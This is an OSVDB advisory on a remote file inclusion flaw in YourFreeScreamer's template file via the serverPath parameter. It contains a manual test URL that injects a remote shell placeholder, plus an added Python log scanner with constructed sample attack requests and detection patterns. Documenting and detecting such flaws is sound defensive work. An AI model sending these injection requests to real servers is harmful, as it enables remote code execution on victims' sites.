YourFreeScreamer templates/2blue/bodyTemplate.php serverPath Variable Remote File Inclusion

2007-06-17T00:00:00
ID OSVDB:36891
Type osvdb
Reporter OSVDB
Modified 2007-06-17T00:00:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/templates/2blue/bodyTemplate.php?serverPath=Sh3ll ?
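A defender can look for this request pattern in web server access logs. The following is an added example, not part of the OSVDB entry or the YourFreeScreamer code; it assumes combined-format access logs and that legitimate traffic does not set serverPath in the query string of the template file. The sample log lines and host names are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Script path and variable named in this advisory; the install prefix varies.
VULN_SCRIPT = "templates/2blue/bodyTemplate.php"
PARAM = "serverPath"  # PHP variable names are case-sensitive
# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that point an include at a URL/stream wrapper or a network share.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

def classify(line):
    """Return None, 'param-set' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    if not unquote(path).lower().endswith("/" + VULN_SCRIPT.lower()):
        return None
    # parse_qs percent-decodes, so an encoded "ftp%3A%2F%2F" is caught too.
    values = parse_qs(query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    if any(REMOTE_RE.match(v.strip()) for v in values):
        return "remote-include"
    return "param-set"

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(i, v) for i, line in enumerate(lines, 1) if (v := classify(line))]

SAMPLE_LOG = [  # constructed lines, not captured traffic
    '192.0.2.10 - - [17/Jun/2007:10:00:00 +0000] "GET /yfs/index.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [17/Jun/2007:10:00:05 +0000] "GET /yfs/templates/2blue/bodyTemplate.php HTTP/1.1" 200 90',
    '192.0.2.12 - - [17/Jun/2007:10:00:09 +0000] "GET /yfs/templates/2blue/bodyTemplate.php?serverPath=http://files.example.test/a.txt? HTTP/1.1" 200 90',
    '192.0.2.13 - - [17/Jun/2007:10:00:12 +0000] "GET /yfs/templates/2blue/bodyTemplate.php?serverPath=ftp%3A%2F%2Ffiles.example.test%2Fa HTTP/1.1" 200 90',
    '192.0.2.14 - - [17/Jun/2007:10:00:20 +0000] "GET /yfs/templates/2blue/bodyTemplate.php?serverPath=./ HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```

With register_globals on, the variable can also be supplied in a POST body or a cookie, which standard access logs do not record, so a clean scan does not rule out abuse.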

References:

Secunia Advisory ID: 25728
Other Advisory URL: http://milw0rm.com/exploits/4075
ISS X-Force ID: 34927
FrSIRT Advisory: ADV-2007-2241
CVE-2007-3271
CVE-2007-3315
Bugtraq ID: 24500